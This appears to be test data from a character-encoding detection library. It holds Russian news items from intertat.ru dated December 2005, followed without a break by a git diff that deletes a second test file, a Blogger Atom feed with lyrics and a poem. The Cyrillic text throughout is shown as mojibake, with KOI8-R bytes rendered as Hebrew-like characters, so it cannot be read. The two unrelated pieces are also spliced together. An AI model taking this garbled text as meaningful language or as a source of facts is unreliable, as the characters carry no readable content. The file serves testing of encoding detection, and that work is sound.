ֻֿֿ׳.עֿ׃׃ֹׁ־ֵ ־ֱ ׀ֵׂ׳ֽֿ ֵֽ׃װֵ, ֹ ֹֽ ֿ׃װֱּֿ׃״ ׃ֱַׂװ״ ׃ֿ ׃׳ֵׂ׃װ־ֱֹֹֻֽ ֹ ‏ֵָֹֹ, ױ ֻֿװָֿׂ ִֿ־ֱ ׀ֱֲִֵֿ ׳ ִ׳ױָ ֱֽװֱָ. ף װֱֹֹֻֽ ײֵ ׀ֱֱֻֿװֵֹּֽׁ ְֱַֹׂװ ׳ כֱ־ֱִֵ ׃ֲֿׂ־ֵ ׳ֳֵֹֹ ֹ ףּֿ׳ֱֹֹֻ. ףֲֿׂ־ֿ עֿ׃׃ֹֹ, װֲֿ ֱ־ׁװ״ ׀ֵׂ׳ֵֿ ֵֽ׃װֿ ׳ ַׂױ׀׀ֵ, ְֱִֵֵ ׀ֱׂ׳ֿ ׃ֱׂױ ׀ֿ׀ֱ׃װ״ ׳ ׀ּֿױֶֹ־ֱּ, ִֿ׃װֱװֿ־ֿ ׃ֱַׂװ״ ׳־ֹ״ְ.«מֵֶװֵָֹֹֻֽ» ַֽֿ ־ֵ ׀ױ׃װֹװ״ «ב׳ֱ־ֱִַׂ» ־ֱ ׳װֵֿֿׂ ֵֽ׃װֿhttp://intertat.ru/index.php?id=80144ק ִֵֵֿׂ־ֽֿ װױֵׂ ֵֽ׀ֹֿ־ֱװֱ ֿׂ׃׃ֹ׃ֻֿ ׃ױ׀ֵַֹֹּׂ ֵָֹֻֻֿ׃װ ־ֹײ־ֱֵֻֽ׃ַֻֿֿ «מֵֶװֱֵָֹֹֻֽ» ױ׃װױ׀ֹֹּ ־ֱ ׃׳ֵֽֿ ּ״ִױ «ֵׂ־ֽ ׁ׃װֱֲֵֽׂ» ֹ ֽֿ׃ַֻֿֿ «ב׳ֱ־ֱֱִַׂ» - 0:3.׃׀ֿׂװSat, 31 Dec 2005 09:56:46 +0300ק ִֵֵֿׂ־ֽֿ װױֵׂ ֵֽ׀ֹֿ־ֱװֱ ֿׂ׃׃ֹ׃ֻֿ ׃ױ׀ֵַֹֹּׂ ֵָֹֻֻֿ׃װ ־ֹײ־ֱֵֻֽ׃ַֻֿֿ «מֵֶװֱֵָֹֹֻֽ» ױ׃װױ׀ֹֹּ ־ֱ ׃׳ֵֽֿ ּ״ִױ «ֵׂ־ֽ ׁ׃װֱֲֵֽׂ» ֹ ֽֿ׃ַֻֿֿ «ב׳ֱ־ֱֱִַׂ» - 0:3.נֻּֿֿ־־ֹֹֻ ֱֱֻ־׃ַֻֿֿ «בֻ גֱׂ׃ֱ» ־ֵ ֲֵ ֿ׃־ֿ׳ֱ־ֹ ֱׂ׃׃ֹװ׳ֱֹּ, װֿ ־ֹײ־ֱֳֵֻֽ ֱִִױװ ֲֿ ֱֹֽֽֿ, ֻֿװֵֿׂ ׀ִֵֵׂ ֱֽװֵֽ ׃ «מֵֶװֵָֹֹֻֽֽֿ» ֱ־ֱֹֹּֽ ֵװ׳ֵׂװֵֿ ֵֽ׃װֿ. מֿ ־ֵ ׀ּֿױֹּֿ׃״: ַֿ׃װֹ ֵֿ־״ ׃ֵׂ״ֵ־ֿ ־ֱ׃װֱֹׂ׳ֱֹּ׃״ ־ֱ ֱֽװ ׃ «מֵֶװֵָֹֹֻֽֽֿ», ֹ ֲֹּ ַֿװֿ׳ ֻֿ ׳׃ֵֽ ֵַֿ ֱִֽֿ־ֹֽ ֱַֿװֿ׳ֱֻֽ. מֱ ׀ֿ׃ֱֵּֽװֵ׳ֿ ׀ֵׂ׃׃-ֻֿ־ֵֵֶׂ־ֳֹֹ װּֿ״ֻֿ ֹ ֱַֿׂ׳ֿֿׂ׳ ֲּֿ ֿ ׀ֵׂ׳ֽֿ ׀ִֵֵֹֿׂ, ֹ׃ִָֿ ֻֿװַֿֿֿׂ ׃ױֵ׃װ׳ֵ־־ֿ ׀ֿ׳ֹּּׁ ־ֱ ֻֿֿ־ֱװֵּ״־ ֵׂױּ״װֱװ. חֿ׃װֹ ִֿ׳ּֿ״־ֿ ֵַֻּֿ ֱֲֿׂ׃ֹֹּ װֹׂ ֲֵֿװ׳ֵװ־ָ ֱֲ ֹ ׳ ֱִּ״־ֵֵֽ ֱַֹֹּׂ ֻֿ־ֽֿ־ֿ, ײֱֵּׁ ׃ֱָֿׂ־ֹװ״ ִֿ׃װַֹ־ױװֵֿ ׀ֵֹֽׂױֵ׃װ׳ֿ. ק װֽֿ ׀ֹׂ־ֱּ׃ׁ ֹ ֱַּ׳־ װֵׂ־ֵׂ «ב׳ֱ־ֱֱִַׂ» קֱֵֹּׂ גֵּֿױ׃ֿ׳. «מֵֶװֵָֹֹֻֽ» ױ׃װױ׀ֹּ - 0:3 ֹ ׀ֿ׳ֹּּֿ «ב׳ֱ־ֱִַׂױ» ׳ׁװ״ װֹׂ ֱֻֿ. ףֲֹֹֹֻׁׂ ׳ ֹװֵַֿ ֲֹּֿֿ ׳ װױׂ־ֹׂ־ֿ װֱֲֳֵֹּ «בֻ גֱׂ׃».ףֵֵַׂ עױֲֵּ׳׃ֹֻ - ֵֽ׀ֹֿ־ עֿ׃׃ֹֹhttp://intertat.ru/index.php?id=80143קֱֵׂ ׳ םֿ׃ֻ׳ֵ ֱ׳ֵֹּׂ׃ׁ ׃ױ׀ֵֶֹׂ־ֱּ 58-ַֿ ֽױײ׃ַֻֿֿ ֵֽ׀ֹֿ־ֱװֱ עֿ׃׃ֹֹ. י ֱ׳ֵֹּׂ׃ׁ ֿ־ ױ׳ֵֵׂ־־ֿ ׀ֲִֵֿֿ ֱֱֻ־׃ַֻֿֿ ַֿׂ׃׃ֵֽ׃װֱֵׂ ףֵֵַׁׂ עױֲֵּ׳׃ַֻֿֿ, ׳ ֹװֵַֿ ־ֱ ֻֿֿ ֿ׀ִֵֵֹׂ׳ֵַֿ ֲֹּײֱֵַֿ ׀ֵׂ׃ִֵּֿ׳ֱװֵּׁ.׃׀ֿׂװSat, 31 Dec 2005 09:54:10 +0300קֱֵׂ ׳ םֿ׃ֻ׳ֵ ֱ׳ֵֹּׂ׃ׁ ׃ױ׀ֵֶֹׂ־ֱּ 58-ַֿ ֽױײ׃ַֻֿֿ ֵֽ׀ֹֿ־ֱװֱ עֿ׃׃ֹֹ. י ֱ׳ֵֹּׂ׃ׁ ֿ־ ױ׳ֵֵׂ־־ֿ ׀ֲִֵֿֿ ֱֱֻ־׃ַֻֿֿ ַֿׂ׃׃ֵֽ׃װֱֵׂ ףֵֵַׁׂ עױֲֵּ׳׃ַֻֿֿ, ׳ ֹװֵַֿ ־ֱ ֻֿֿ ֿ׀ִֵֵֹׂ׳ֵַֿ ֲֹּײֱֵַֿ ׀ֵׂ׃ִֵּֿ׳ֱװֵּׁ.נִֵֵׂ ְֱֹֻּװֵּ״־ֽ װױֽֿׂ װֵֵֿׂװֵֹ׃ֵֹֻ ֱ־׃ ִַֿ־ֱװ״ עױֲֵּ׳׃ַֻֿֿ, ױ ֻֿװַֿֿֿׂ ֲּֿ 7 ֻֿֿ׳ ֹ 10 ׳ֽֿֿײ־ָ, ׃ֱָֿׂ־ּׁ װּֿ״ֻֿ הֹֽװֹׂ סֻֿ׳ֵ־ֻֿ, ֿװ׃װֱ׳ֱ׳ֹ ־ֱ ִֿ־ֿ ֻֿֿ. מֿ ־ֵ ־ֱִֿ ֲװ״ ׃װֱׂװֵַֽֿ, װֲֿ ׀ֿ־ׁװ״, װֿ ׳ ׀ֿ׃ִֵּ־ֵֽ װױֵׂ, ֱֻֻ ׀ֱׂ׳ֹּֿ, ױײֵ ֱּֽֿ װֿ ֱֵֵׂװ׃ׁ. י ֽֿײ־ֿ ֲּֿ ׀ַֿׂ־ֹֿֿׂ׳ֱװ״, װֿ ַֿׂ׃׃ֵֽ׃װֵׂ, ױײֵ ױ׃װֱ׳ֵֹ ֿװ ֱֱָֽװ, ֱ ׃ִֵֹׂ ױֱ׃װ־ֹֻֿ׳ ֲּֿ ־ֱֵּֽֿ װֵָ, ֻװֿ ׀ֿװֹ ֵֽ׃ֳׁ ֱַֹּׂ ׳ טֱ־װ-םֱ־׃ֹ׃ֵֻ ־ֱ כױֲֵֻ ֱֹֽׂ, ׀ֿ׃װְֱֱׂװ׃ׁ ׀ֲֿ׃װֵֵׂ ֱ׳ֵֹׂװ״ ׃ױ׀ֵֶֹׂ־ֱּ. פֵֽ ֲֵֵּֿ װֿ מֿ׳ ִַֿ ־ֱ ־ֿ׃ױ.נֱׂװֹֹ ִֹֿ־־ֱֱֳִװַֿֿ װױֱׂ ־ֱֱֹּ׃״ ׳ 11.00, ֹ ױײֵ ֵֵׂ ִ׳ֱ ֱ׃ֱ ֵװֵׂ ֹ ־ָֹ ֱ׳ֵֹֹּׂ׃״ ׳־ֹ״ְ. טֱֱֶֹּֽ־ ׀ִֿ׀ֹ׃ֱּ ׀ֵֵֵֹֹֽׂׂ ׃ כֱֽׂ־ֹֻֽֿ, גֱֵֵׂ׳ ׃ פֱֵֽֿ׳׃ֹֻֽ, ֱ הֵֵׂ׳ ׃ֿ ף׳ִֵֹּֽֿׂ. נֿװֽֿ ֱ׳ֱֵֹּׂ׃״ ׀ֱׂװֹׁ ־ֱ ִֿ׃ֵֻ, ִֵַ ֵׂ־ֹֽ ֶַֹױֱֹֽׂ ׃ֿ ת׳ַֹׁ־ֳֵ׳ֽ ֱַֹּׂ עױֲֵּ׳׃ֹֻ. נֿ׃ֵּ 17-ַֿ ֱִָֿ ׃װֿֿׂ־ ׃ֱַּֿ׃ֹֹּ׃״ ־ֱ ־ֹ״ְ.יװֱֻ, ֵֽײִױ־ֱִֿׂ־ ַֿׂ׃׃ֵֽ׃װֵׂ ףֵֵַׂ עױֲֵּ׳׃ֹֻ ׃װֱּ ֵֽ׀ֹֿ־ֽֿ עֿ׃׃ֹֹ. ף ֵֽ ֵַֿ ֹ ׀ֱִֿׂ׳ֵּֽׁ. כֱֻ ֹ ֽ־ַֹֿֿ׃ֵּ־־ױְ ְֱֹֽׂ ׀ֻּֿֿ־־ֹֻֿ׳ ֱֱָֽװ פֱװֱׂ׃װֱ־ֱ!ץ «כֱֽבתֿ׳» ֹ׃ּֿ ׃ֿ׀ֵׂ־ֹֻֿ׳ ׃ֱֻֿׂװֹּֿ׃״ ־ֱ ׀ׁװ״http://intertat.ru/index.php?id=80142ק ־ֱֹ־ְֱֵֽ׃ׁ ׃ִֵַֿ־ׁ ֱֹּּׂ «הֱֱֻׂ-2006» ױײֵ ֵ׃װ״ ׀ֿװֵֹׂ. פֵָ־ֵֹ׃ֹֻ ֹֻֽֿװֵװ ַֿ־ֹֻ ־ֵ ִֿ׀ױ׃װֹּ ִֿ ׃װֱׂװֱ ׀ׁװ״ ַׂױֿ׳ֱֹֻֽ ֱֻֽֿ־ִ DAF - ִֿ־ַֿֿ ֹ ֱַּ׳־ָ ֻֿ־ֻױֵׂ־װֿ׳ ֿׂ׃׃ֹ׃ֻֿ ֱֻֽֿ־ִ «כֱֽבת-םֱ׃װֵׂ» ־ֱ װֵָׂ ׀ֿ׃ִֵּ־ָֹ ׃ױ׀ֱֱֵֶֽֿׂׂ־ֱָ ׀ֿ ֱֱֶֹֻׂ־׃ֻֽֿױ ֲִֵֿֿׂײ״ְ.׃׀ֿׂװSat, 31 Dec 2005 09:52:03 +0300ק ־ֱֹ־ְֱֵֽ׃ׁ ׃ִֵַֿ־ׁ ֱֹּּׂ «הֱֱֻׂ-2006» ױײֵ ֵ׃װ״ ׀ֿװֵֹׂ. פֵָ־ֵֹ׃ֹֻ ֹֻֽֿװֵװ ַֿ־ֹֻ ־ֵ ִֿ׀ױ׃װֹּ ִֿ ׃װֱׂװֱ ׀ׁװ״ ַׂױֿ׳ֱֹֻֽ ֱֻֽֿ־ִ DAF - ִֿ־ַֿֿ ֹ ֱַּ׳־ָ ֻֿ־ֻױֵׂ־װֿ׳ ֿׂ׃׃ֹ׃ֻֿ ֱֻֽֿ־ִ «כֱֽבת-םֱ׃װֵׂ» ־ֱ װֵָׂ ׀ֿ׃ִֵּ־ָֹ ׃ױ׀ֱֱֵֶֽֿׂׂ־ֱָ ׀ֿ ֱֱֶֹֻׂ־׃ֻֽֿױ ֲִֵֿֿׂײ״ְ.ןֲ װֽֿ ׃װֱּֿ ֹ׳ֵ׃װ־ֿ ׳ ׀ׁװ־ֳֹױ, ֱִַֻֿ ֱ׳ֵֹּׂ ׃׳ְֿ ֱֲֿׂװױ װֵָ־ֵֹ׃ֹֻ ֹֻֽֿװֵװ, ׀ֿׂ׳ֵׁׂ׳ֹ ׳׃ֵ ֱ׳װֲֹֹּֽֿֿ ֹ ֽֿװֳֹֻּֿ, ֱׁ׳ֵּ־־ֵ ־ֱ ױֱ׃װֵֹ ׳ ַֿ־ֵֻ, ־ֱ ׃ֿֿװ׳ֵװ׃װ׳ֵֹ װֵָ־ֵֹ׃ֹֻֽ װֲֵֿׂ׳ֱ־ֹֽׁ. ב ֿ־ֹ ׳ ׀ֿ׃ִֵּ־ֵֹ ִַֿ ׃װֱ־ֿ׳ׁװ׃ׁ ׳׃ֵ ׃װֿׂײֵ. ק ׃ֲֵֿֿ־ָֹׁ ֱֹּׂ־ָ ףםי ֱִֵװ׃ׁ ׃׃ֱֻּ ־ֱ ֱׁ׳ֵּ־ֵֹ ׀ִֵׂ׃ֱִֵװֵּׁ ֵַֹֹֻּּֿ װֵָ־ֵֹ׃ָֹֻ ֹֻֽֿ׃׃ֱֿׂ׳ עֱֲֵֿׂ לְֱַּ״ֿ־ֱ, ֻֿװֿׂ ֿװֱֵֵֽװ, װֿ ֿ־ ׃ ֱֵַֹֻּּֽֿ, ׳ׁ׳ֹּ ֳֵּ ִׁׂ ־ֵ׃ֿֿװ׳ֵװ׃װ׳ֹ װֵָ־ֵֹ׃ֹֻֽ װֲֵֿׂ׳ֱ־ֹֽׁ. מֿ, ֱֹֻֻֽ ֵֹֽ־־ֿ, ױװֿ־ׁװ״ ־ֵ ׃װֱּ.טֿװׁ ֹ׃ּֿ ׀ֵׂװֵ־ִֵ־װֿ׳ ־ֱ ׀ֲִֵֿױ ׳ ֱֻּ׃׃ֵ ַׂױֿ׳ֹֻֿ׳ ֹ ׃ֱֻֿׂװֹּֿ׃״, ־ֿ װֿ ׳ֿ׳׃ֵ ־ֵ ֿ־ֱֱֵװ, װֿ ױ «כֱֽבתֿ׳» ֲױִֵװ ־ֱ ־־ֵ־ֵֽ «הֱֱֵֻׂ» «ֵֵּ־ֱׁ» ֱִַֿֿׂ ֻ ֶֹ־ֹױ.נִֵֵֹׂ־װ פֱװֱׂ׃װֱ־ֱ ׀ִֿ׀ֹ׃ֱּ ִֵ׳ׁװ״ ֱֻֿ־ֿ׳ http://intertat.ru/index.php?id=80140נִֿ׀ֹ׃ֱ־ ֱֻֿ־ «ן ֵַֹֿׂ־ֱּ״־ָ ׃װֱ־ֱִׂװֱָ ֿ׀ֱּװ ײַֹּֿֿ ׀ֵֵֽֿ-־ֹׁ ֹ ֻֽֽֿױ־ֱּ״־ָ ױ׃ּױַ ׳ עֵ׃׀ױֲֵֹֻּ פֱװֱׂ׃װֱ־», ֻֿװֽֿׂ ֿ׀ְִֵֵּׁׂװ׃ׁ ֿ׃־ֿ׳ ֶֹֽֿֿׂׂ׳ֱ־ֹׁ ֵַֹֿׂ־ֱּ״־ָ ׃װֱ־ֱִׂװֿ׳ ׳ ֱִ־־ֿ ׃ֵֵֶׂ, ׀ֵֹֽׂ־ָֽׁ ִּׁ ֱׂ׃ֵװֱ ׃ױֲ׃ִֹֹ ֱַׂײֱִ־ֱֽ ׀ֹׂ ֿ׀ֱּװֵ ײַֹּֿֿ ׀ֵֵֽֿ־ֹׁ ֹ ֻֽֽֿױ־ֱּ״־ָ ױ׃ּױַ ׳ ֵׂ׃׀ױֲֵֹֻּ, ׃ֱֲֵֿֿװ נֵׂ׃׃-ֳֵ־װׂ נִֵֵֹׂ־װֱ עפ.׀ֹּֿװֱֹֻSat, 31 Dec 2005 09:42:52 +0300נִֿ׀ֹ׃ֱ־ ֱֻֿ־ «ן ֵַֹֿׂ־ֱּ״־ָ ׃װֱ־ֱִׂװֱָ ֿ׀ֱּװ ײַֹּֿֿ ׀ֵֵֽֿ-־ֹׁ ֹ ֻֽֽֿױ־ֱּ״־ָ ױ׃ּױַ ׳ עֵ׃׀ױֲֵֹֻּ פֱװֱׂ׃װֱ־», ֻֿװֽֿׂ ֿ׀ְִֵֵּׁׂװ׃ׁ ֿ׃־ֿ׳ ֶֹֽֿֿׂׂ׳ֱ־ֹׁ ֵַֹֿׂ־ֱּ״־ָ ׃װֱ־ֱִׂװֿ׳ ׳ ֱִ־־ֿ ׃ֵֵֶׂ, ׀ֵֹֽׂ־ָֽׁ ִּׁ ֱׂ׃ֵװֱ ׃ױֲ׃ִֹֹ ֱַׂײֱִ־ֱֽ ׀ֹׂ ֿ׀ֱּװֵ ײַֹּֿֿ ׀ֵֵֽֿ־ֹׁ ֹ ֻֽֽֿױ־ֱּ״־ָ ױ׃ּױַ ׳ ֵׂ׃׀ױֲֵֹֻּ, ׃ֱֲֵֿֿװ נֵׂ׃׃-ֳֵ־װׂ נִֵֵֹׂ־װֱ עפ.הׂױַֹֽ ֱֻֿ־ֽֿ ױ׃װֱ־ֱ׳ֹּ׳ֱֵװ׃ׁ ׃ֹ׃װֱֵֽ ׳ֱֹֽֿֿװ־ֵֿ־ֹ ׀ֹׂ ֶֹֽֿֿׂׂ׳ֱ־ֹֹ ֵַׂױֹּׂױֵָֽ ֳֵ־ ֹ װֱֶֹֿׂ׳ ־ֱ װֿ׳ֱׂ ֹ ױ׃ּױַֹ ִּׁ ׀ֿװֲֵֹׂװֵֵּ ׳ עֵ׃׀ױֲֵֹֻּ פֱװֱׂ׃װֱ־, ׳ װֽֿ ֹ׃ֵּ ־ֱ ײֹֹּ־ֿ-ֻֽֽֿױ־ֱּ״־ֵ ױ׃ּױַֹ, ױ׃ּױַֹ ׀ֿ ׀ֵֵׂ׳ֵֻֿ ׀ֱ׃׃ֱײֹֿׂ׳ ֹ ֱֱֲַײֱ ׳׃ֵֹֽ ׳ֱִֹֹֽ ֲֵֿ׃װ׳ֵ־־ַֿֿ װֱׂ־׃׀ֿׂװֱ.ק־ֵ׃ֵ־ ֵֹֽ־ֵ־ֹׁ ׳ כִֵֻֿ׃ עֵ׃׀ױֲֹֹֻּ פֱװֱׂ׃װֱ־ ֲֿ ֱִֹֽ־ֹ׃װֱׂװֹ׳־ָ ׀ֱׂ׳ֿ־ֱׂױֵ־ָֹׁ, ֻֿװֹֽֿׂ ֿ׀ִֵֵֵּׁׂװ׃ׁ ׀ִֿ׳ִֵֽֿ׃װ׳ֵ־־ֿ׃װ״ ִֵּ ֱִֹֽ־ֹ׃װֱׂװֹ׳־ֽ ֹֻֽֿ׃׃ֹֽׁ.ףִֵּױְֹֽ ֱֻֿ־ֽֿ ֿ׀ְִֵֵּׁׂװ׃ׁ ׀ִֵֵּׂ״־ֵ ־ֱֽֿׂװֹ׳ ֱֱֵֽׂׂ ֿ׀ֱּװ װׂױֱִ ִֵ׀ױװֱװֿ׳, ֵּ־ֿ׳ ׳ֲֿׂ־ָ ֱַֿׂ־ֿ׳ ֵֽ׃װ־ַֿֿ ׃ֱֽֿױ׀ֱׂ׳ֵּ־ֹׁ, ׳ֲֿׂ־ָ ִּֿײ־ֿ׃װ־ָ ֳֹּ ֵֽ׃װ־ַֿֿ ׃ֱֽֿױ׀ֱׂ׳ֵּ־ֹׁ, ֿ׃ױֵ׃װ׳ְָֹּׁ ׃׳ֹֿ ׀ּֿ־ֹֽֿֿׁ ־ֱ ׀ֿ׃װֿׁ־־ֿ ֿ׃־ֿ׳ֵ, ֽױ־ֳֹֹ׀ֱּ״־ָ ׃ּױײֱָֹ, ֱֲֿׂװ־ֹֻֿ׳ ֽױ־ֳֹֹ׀ֱּ״־ָ ׀ִֵׂ׀ֹׁׂװֹ ֹ ױֵׂײִֵ־ֹ.תֱֻֿ־ֽֿ «ן ־ֱִֵֵּ־ֹֹ ֽױ־ֳֹֹ׀ֱּ״־ָ ֱֲֿֿׂ׳ֱ־ֹ ַֿ׃ױֱִׂ׃װ׳ֵ־־ֹֽ ֱֽװֱֵֹּׂ״־ֹֽ ֵׂ׃ױׂ׃ֱֹֽ ֹ ַֿ׃ױֱִׂ׃װ׳ֵ־־ֹֽ ׃ױֲ׃ִֹֹֹֽׁ ִּׁ ֵֵׂ־ֹׁ ׳ֿ׀ֿׂ׃ֿ׳ ֵֽ׃װ־ַֿֿ ־ֱֵ־ֹׁ» ױ׃װֱ־ֱ׳ֹּ׳ְֱװ׃ׁ ױ׃ּֿ׳ֹׁ ׀ֱִֵֵֹׂ ֱַֿׂ־ֱֽ ֵֽ׃װ־ַֿֿ ׃ֱֽֿױ׀ֱׂ׳ֵּ־ֹׁ ַֿ׃ױֱִׂ׃װ׳ֵ־־ָ ֱֽװֱֵֹּׂ״־ָ ֵׂ׃ױׂ׃ֿ׳ ִּׁ ֵֵׂ־ֹׁ ׳ֿ׀ֿׂ׃ֿ׳ ֵֽ׃װ־ַֿֿ ־ֱֵ־ֹׁ ֹ ׀ִֵֿׂ׃װֱ׳ֵּ־ֹׁ ׃ױֲ׃ִֹֹ ֹ ֵַֹֿׂ־ֱּ״־ָ ֶֿ־ִֿ׳ ֽױ־ֳֹֹ׀ֱּ״־ַֿֿ ֱׂ׳ֹװֹׁ ֹ ׃ֶֹֿ־ֱ־׃ֹֿׂ׳ֱ־ֹׁ ׃ֱֳֹּֿ״־ָ ֱׂ׃ָֿ-ִֿ׳, ֹ־ֿ ֶֹ־ֱ־׃ֿ׳ֿ ׀ֹֽֿֿ ֹ ְֲִײֵװֱ עֵ׃׀ױֲֹֹֻּ פֱװֱׂ׃װֱ־.הׂױַֹֹֽ ֱֻֿ־ֱֹֽ ֱַֿׂ־ ֵֽ׃װ־ַֿֿ ׃ֱֽֿױ׀ֱׂ׳ֵּ־ֹׁ עֵ׃׀ױֲֹֹֻּ פֱװֱׂ׃װֱ־ ־ְֱִֵּׁװ׃ׁ ֿװִֵּ״־ֹֽ ַֿ׃ױֱִׂ׃װ׳ֵ־־ֹֽ ׀ּֿ־ֹֹֽֽֿֿׁ ׳ ׃ֵֵֶׂ ֱֲֿֿׂ׳ֱ־ֹׁ ֹ ֱַֿׂ־ֱֳֹֹֹ ִֵׁװֵּ״־ֿ׃װֹ ֹֻֽֿ׃׃ֹ ׀ֿ ֱִֵּֽ ־ֵ׃ֿ׳ֵֵׂ־־ֵּֿװ־ָֹ ֹ ֱֹװֵ ָֹ ׀ֱׂ׳; ֱֲֿֿׂ׳ֱ־ֹׁ ֹ ֱַֿׂ־ֱֳֹֹֹ ִֵׁװֵּ״־ֿ׃װֹ ֱִֹֽ־ֹ׃װֱׂװֹ׳־ָ ֹֻֽֿ׃׃ֹ; ַֿ׃ױֱִׂ׃װ׳ֵ־־ֿ ֵַֹׂ׃װֱֳֹֹׂ ֱֻװֿ׳ ֱַׂײֱִ־׃ַֻֿֿ ׃ֿ׃װֿׁ־ֹׁ; ׃ֱֳֹּֿ״־ַֿֿ ֲֿ׃ּױײֹ׳ֱ־ֹׁ ־ֱ׃ֵֵּ־ֹׁ. פֵֻ׃װ ֱֻֿ־ֿ׳ ֲױִױװ ֿ׀ױֲֹֻּֿ׳ֱ־ ׳ ׃ִֵׂ׃װ׳ֱָ ֱֽ׃׃ֿ׳ֿ ֹ־ֱֳֶֹֹֽֿׂ. diff --git a/chardet/tests/KOI8-R/janulalife.blogspot.com.xml b/chardet/tests/KOI8-R/janulalife.blogspot.com.xml deleted file mode 100644 index e401383..0000000 --- a/chardet/tests/KOI8-R/janulalife.blogspot.com.xml +++ /dev/null @@ -1,165 +0,0 @@ - - - - - - -JaNuLa's L1FE MOMENTS -If you love Her as much as I love Her then you won't steal Her...I never know what the future brings -But I know she'll be here with me...Don't give me names -You've got it all, took it all from me -Drove me insane -Who'd come down to earth, releasing me -Healing my wounds -So why don't you close the door when you're leaving me -Now you'll run -Running all the way back to me again... -ק׃ֵװֱֹֻ ֿ־ ֵֵ ױֱֻּׂ, ־ֱֹװ ־ֵ ְֲֹּּ... - -tag:blogger.com,1999:blog-11182692 -2005-11-27T14:59:40Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -lucky - -2005-11-20T18:50:00+02:00 -2005-11-20T17:39:14Z -2005-11-20T17:39:14Z - -tag:blogger.com,1999:blog-11182692.post-113250835408580855 -נֵׂ׳ ׃־ֵַ... ׳ װֽֿ ִַֿױ -<BODY><A HREF='http://photos1.blogger.com/blogger/7360/820/1024/collage11.jpg'><IMG SRC='http://photos1.blogger.com/blogger/7360/820/400/collage11.jpg' border=0 alt='' style='clear:all;float:left;margin: 0px 10px 10px 0px; cursor:hand'></A>&nbsp;<br /></BODY> נֵׂ׳ ׃־ֵַ, ֻֿװֿׂ ֱֲֿׁװֵּ״־ֿ ִּֿײֵ־ ֱׂ׃װֱׁװ״. ןװ׀ֱׂ׳ֵּ־־ֵֿ ׃ֽ׃ -מְֱִֵ׃״, װ ֱֱִׂ װֽֿױ ׀ֵׂ׳ֽֿױ,ֲֵּֽֿױ, ֹ׃װֽֿױ ׃־ֵַױ :) ׀ֹׂ־ֵ׃ּֿ ׃ ׃ֲֿֿ ֱ׃ ֲֵֿ־ֹׁ ׃ ְֲֹּֽֽ ֵּֿ׳ֵֻֽֿ. טֿױ ֹּ ׁ ׳ִֵֹװ״ װֲֵׁ ׳ כֵֽׂ־ֵ? הֱ, ֻֿ־ֵ־ֿ, ־ֱ׳ֵׂ־ֵֿ, ׃ֻֿֿׂ ֲױִױ, װֿ־ֿ. :) פֱֻ ־ֵֵּ׀ֿ ־ֱ׃װױ׀ֱװ״ ־ֱ װֿװ ֹ׃װ, ֲֵּ ׃־ֵײ־ ׀ֻֿֿׂ׳, ־ֵ ־ֱִָֹֿ״? ק׃ֵ ׳ֻֿׂױַ ֱ ֱ׃ ׃װֱּֿ ֹ׃װֽ ֹ װֱֻ ־ֵ׳ֹ־־ֽ...מֱִַּֿֿ ֹּ?&nbsp;<a href='http://picasa.google.com/' target='ext'><img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' style='border: 0px none ; padding: 0px; background: transparent none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;' align='middle' border='0' /></a> -false - - - - - -lucky - -2005-11-18T21:57:00+02:00 -2005-11-18T20:04:01Z -2005-11-18T19:57:00Z - -tag:blogger.com,1999:blog-11182692.post-113234382000287438 -נֹׂ׃ֱּ־ֿ ֽ־ֵ ׀ֹֿװֱװ״... -ס ־ְֱ ֹֽׂ -- ֿ־ ׃װֱׂ ֹ ׀ּֿֿ־ ִׁׂ־ֹ,<br />ס ־ְֱ ׀װֳֹ, ֵּװָֹׁ ־ֱ ֱֽ־ֻֿ,<br />ס ־ְֱ, ֱֻֻ ׳ֵ־ֹװ ִֵ־״ֱַ ׳ ֱֱֻֽׂ־ֵ<br />י ֱֻֻ ׳ֵ־ֹװ ֿװװֵֿ־־ ֹֻּ־ֻֿ.<br />ס ־ְֱ, ֱֻֻ ׀ְֿװ ־ֱ ֱֶֿװֵ,<br />ס ־ְֱ, ֱֻֻ ֳֵּױְװ, ־ֵ ְֲּׁ,<br />ס ־ְֱ װֵָ, ֻװֿ <<ֱ>> ֹ װֵָ, ֻװֿ <<׀ֿׂװֹ׳>>,<br />ס ־ְֱ ׳׃ֵ, ־ֿ װּֿ״ֻֿ ־ֵ ׃ֲֵׁ.<br /><br />ס ־ְֱ ְָּ -- ֿ־ֹ ִַֿׂ, ֱֻֻ ֱִֽ,<br />ס ־ְֱ ֱִֽ -- ֿ־ֹ ִֵֵ׳ֵּ ְָּ,<br />ס ־ְֱ װֿ, ֿ ֵֽ ֱּֽֿװ ֱִַֹֽֿ,<br />ס ־ְֱ װֿ, װֿ ׀ֹֿׂ־ֿ׃ׁװ ׳׃ּױָ,<br />ס ־ְֱ, ֱֻֻ ֵׂ־ֿ ְְֻּװ ׀ֱ׳ֹּ־<br />י ֱֻֻ ׳ֿֿׂ־ װׂױ׀ װֲֵֵׁׂװ,<br />ס ־ְֱ ײֹ־״ -- ֿ־ֱ ־ֵ ֲױִֵװ ִֹּ־־ֿ,<br />ס ־ְֱ ׳׃ֵ, ־ֿ װּֿ״ֻֿ ־ֵ ׃ֲֵׁ.<br /><br />ס ־ְֱ ֹֽׂ -- ֵַֿ ׃ױִֹװ״ ֵַֻּֿ ־ֱֽ,<br />קִֵ״ ׳׃ֵֽ ִֿ ׃ֿ׳ֵֵׂ־׃װ׳ֱ ֱִֵֻּֿ,<br />ס ־ְֱ, ֱֻֻ ֱּֽֿװ ׀ִֵֵׂ ֱֻֿ־ֽֿ,<br />י ־ְֱ, ֱֻֻ ׀ֿֿׂ ֹּֽֿװ ֱֻֿ־.<br />ס ־ְֱ, ֱֻֻ ֱ ָ׳ֿ׃װ ּֿ׳ֹװ״ ױֱִױ,<br />ק׃ֵָ ֱׂ׃װֱֻּֿ׳ ֹ ֱֻײִֽֿױ ַׂױֲׁ,<br />ס ־ְֱ -- װּֿ״ֻֿ װֱֻ, ֱ ־ֵ ֹ־ֱֵ...<br />ס ־ְֱ ׳׃ֵ, ־ֿ װּֿ״ֻֿ ־ֵ ׃ֲֵׁ.<br /><br /><br /> (׃) ן. לֱִײֵ־׃ֹֻ, 1998<br /><a href="http://lib.ru/OLDI/poez.txt"></a> -false - - - - -lucky - -2005-11-16T03:39:00+02:00 -2005-11-16T01:49:16Z -2005-11-16T01:49:16Z 